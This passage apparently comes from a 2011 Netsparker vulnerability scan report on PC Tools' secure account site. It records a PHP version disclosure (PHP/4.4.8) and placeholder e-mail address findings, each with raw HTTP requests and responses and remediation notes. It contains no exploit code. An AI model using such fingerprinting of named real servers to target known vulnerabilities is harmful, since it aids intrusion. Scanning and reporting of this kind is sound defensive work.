</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <p align="right" style="margin-top: 0px;"><a href="http://www.pctools.com/support/">Go to Support Home Page</a><br><a href="http://www.pctools.com/contact/support/">Go to Online Knowledgebase</a></p><h1>PC Tools Login</h1><div class="support-box first"> <div class="title-bar"><h4>Login to My Account</h4></div> <div class="support-box-content"> <p>Please enter your login details below to access PC Tools MyAccount.</p> <p class="error" style="margin-left: 4px;"></p> <form id="login" method="post" action="/myaccount/"> <label class="fieldlabel" for="username">E-mail:</label> <input class="textinput" name="username" type="text" value=""> <label class="fieldlabel" for="password">Password:</label> <input class="textinput" name="password" type="password"> <input name="remember" type="checkbox" value="1"> <label for="remember">Remember me on this computer</label> <button class="btn-login" value="Login" type="submit" style=" background-image: url(/res/new/images/support/btn-login.png)">Login Now!</button> </form> <p class="small"><a href="/myaccount/signup/">Don't have an account</a> or <a href="/myaccount/password/">forgot your password?</a></p> </div></div><div class="support-box"> <div class="title-bar"> <h4>Create an Account</h4></div> <div class="support-box-content"> <p>New to PC Tools? Create an account now and stay informed about important software upgrades, new product releases, special offers, subscription expiry reminders and personalized online support.</p> <a class="signup-now" style=" background-image: url(/res/new/images/btn-signupnow.jpg)" href="/myaccount/signup/">Signup Now!</a> </div></div> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="righ..

PHP Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

- /myaccount/

/myaccount/

https://secure.pctools.com/myaccount/

Extracted Version

PHP/4.4.8

Request

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6468
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:08 GMT
Connection: keep-alive
Set-Cookie: PHPSESSID=3054e84060529fb5cfb6b5e5ad017989; expires=Mon, 21 Mar 2011 02:23:08 GMT; path=/; domain=pctools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <p align="right" style="margin-top: 0px;"><a href="http://www.pctools.com/support/">Go to Support Home Page</a><br><a href="http://www.pctools.com/contact/support/">Go to Online Knowledgebase</a></p><h1>PC Tools Login</h1><div class="support-box first"> <div class="title-bar"><h4>Login to My Account</h4></div> <div class="support-box-content"> <p>Please enter your login details below to access PC Tools MyAccount.</p> <p class="error" style="margin-left: 4px;"></p> <form id="login" method="post" action="/myaccount/"> <label class="fieldlabel" for="username">E-mail:</label> <input class="textinput" name="username" type="text" value=""> <label class="fieldlabel" for="password">Password:</label> <input class="textinput" name="password" type="password"> <input name="remember" type="checkbox" value="1"> <label for="remember">Remember me on this computer</label> <button class="btn-login" value="Login" type="submit" style=" background-image: url(/res/new/images/support/btn-login.png)">Login Now!</button> </form> <p class="small"><a href="/myaccount/signup/">Don't have an account</a> or <a href="/myaccount/password/">forgot your password?</a></p> </div></div><div class="support-box"> <div class="title-bar"> <h4>Create an Account</h4></div> <div class="support-box-content"> <p>New to PC Tools? Create an account now and stay informed about important software upgrades, new product releases, special offers, subscription expiry reminders and personalized online support.</p> <a class="signup-now" style=" background-image: url(/res/new/images/btn-signupnow.jpg)" href="/myaccount/signup/">Signup Now!</a> </div></div> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="righ..

E-mail Address Disclosure

1 TOTAL

INFORMATION

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Wikipedia - E-Mail Spam

- /myaccount/password/

/myaccount/password/

https://secure.pctools.com/myaccount/password/

Found E-mails

username@isp.com
ScreenName@aol.com

Request

POST /myaccount/password/ HTTP/1.1
Referer: https://secure.pctools.com/myaccount/password/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.pctools.com
Cookie: PHPSESSID=de9ec96a2cf9e0fc329d52c9d14784b5
Content-Length: 6
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

email=

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6109
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:19 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <h1>Forgot Password</h1><div>Please enter your email address below and we will send you a new password.</div><br> <div class="error">Please enter an email address in the form <em>username@isp.com</em>, if you are an AOL user please enter your ScreenName@aol.com. </div><br><form method="POST"><b>E-mail Address:</b><br><input type="text" name="email" class="textfield" size="40" value=""><input type="submit" value="Submit" class="button_blue"></form> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a 